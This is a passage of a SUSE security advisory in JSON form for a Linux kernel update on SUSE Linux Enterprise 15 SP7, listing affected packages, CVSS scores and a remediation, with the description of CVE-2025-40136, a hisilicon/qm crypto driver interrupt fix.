"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-40132"
},
{
"cve": "CVE-2025-40136",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40136"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: hisilicon/qm - request reserved interrupt for virtual function\n\nThe device interrupt vector 3 is an error interrupt for\nphysical function and a reserved interrupt for virtual function.\nHowever, the driver has not registered the reserved interrupt for\nvirtual function. When allocating interrupts, the number of interrupts\nis allocated based on powers of two, which includes this interrupt.\nWhen the system enables GICv4 and the virtual function passthrough\nto the virtual machine, releasing the interrupt in the driver\ntriggers a warning.\n\nThe WARNING report is:\nWARNING: CPU: 62 PID: 14889 at arch/arm64/kvm/vgic/vgic-its.c:852 its_free_ite+0x94/0xb4\n\nTherefore, register a reserved interrupt for VF and set the\nIRQF_NO_AUTOEN flag to avoid that warning.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40136",
"url": "https://www.suse.com/security/cve/CVE-2025-40136"
},
{
"category": "external",
"summary": "SUSE Bug 1253340 for CVE-2025-40136",
"url": "https://bugzilla.suse.com/1253340"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
